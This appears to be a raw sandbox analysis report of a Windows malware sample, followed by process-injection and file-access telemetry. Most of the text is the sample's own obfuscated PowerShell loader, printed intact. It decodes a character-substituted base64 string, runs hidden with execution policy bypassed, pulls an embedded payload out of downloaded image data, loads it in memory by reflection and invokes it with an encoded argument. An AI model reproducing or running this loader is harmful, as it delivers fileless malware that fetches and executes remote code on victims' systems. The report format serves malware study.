€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€WwBv€€GI€€agBl€€GM€€d€€Bb€€F0€€XQ€€g€€Cg€€JwBk€€Eg€€a€€€€w€€Ew€€bQBw€€Ho€€YQBI€€Fo€€bgBh€€Ec€€c€€€€0€€Fk€€agBR€€DI€€WgBY€€E4€€a€€BZ€€G0€€VgB1€€GE€€W€€Bw€€DE€€WQB5€€Dg€€M€€BO€€Ho€€RQB1€€E4€€egBN€€HU€€TgBE€€FU€€eQBM€€Go€€VQ€€0€€E0€€Uw€€4€€HY€€TwBu€€EI€€M€€Bk€€Ec€€Zw€€9€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€GQ€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€YQBk€€HM€€YQ€€n€€C€€€€L€€€€g€€Cc€€Z€€Bl€€Cc€€I€€€€s€€C€€€€JwBj€€HU€€Jw€€p€€Ck€€';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
Process injection Process 3068 resumed a thread in remote process 1776
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000000000000368
suspend_count: 1
process_identifier: 1776
1 0 0
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe